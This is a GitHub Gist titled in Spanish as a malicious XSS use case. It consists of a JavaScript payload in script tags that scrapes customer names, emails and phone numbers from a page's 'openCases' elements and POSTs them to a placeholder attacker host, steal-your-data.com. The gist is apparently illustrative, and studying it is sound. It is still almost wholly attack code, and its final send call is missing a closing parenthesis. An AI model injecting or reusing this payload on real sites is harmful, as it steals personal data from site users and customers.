Created
June 28, 2023 20:39
-
-
Save juanchehin/f0f38a6564b7301ac763de1b58cc4198 to your computer and use it in GitHub Desktop.
XSS: Caso de uso malicioso
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| /* | |
| * Get a list of all customers from the page. | |
| */ | |
| const customers = document.querySelectorAll('.openCases'); | |
| /* | |
| * Iterate through each DOM element containing the openCases class, | |
| * collecting privileged personal identifier information (PII) | |
| * and store that data in the customerData array. | |
| */ | |
| const customerData = []; | |
| customers.forEach((customer) => { | |
| customerData.push({ | |
| firstName: customer.querySelector('.firstName').innerText, | |
| lastName: customer.querySelector('.lastName').innerText, | |
| email: customer.querySelector('.email').innerText, | |
| phone: customer.querySelector('.phone').innerText | |
| }); | |
| }); | |
| /* | |
| * Build a new HTTP request, and exfiltrate the previously collected | |
| * data to the hacker's own servers. | |
| */ | |
| const http = new XMLHttpRequest(); | |
| http.open('POST', 'https://steal-your-data.com/data', true); | |
| http.setRequestHeader('Content-type', 'application/json'); | |
| http.send(JSON.stringify(customerData); | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment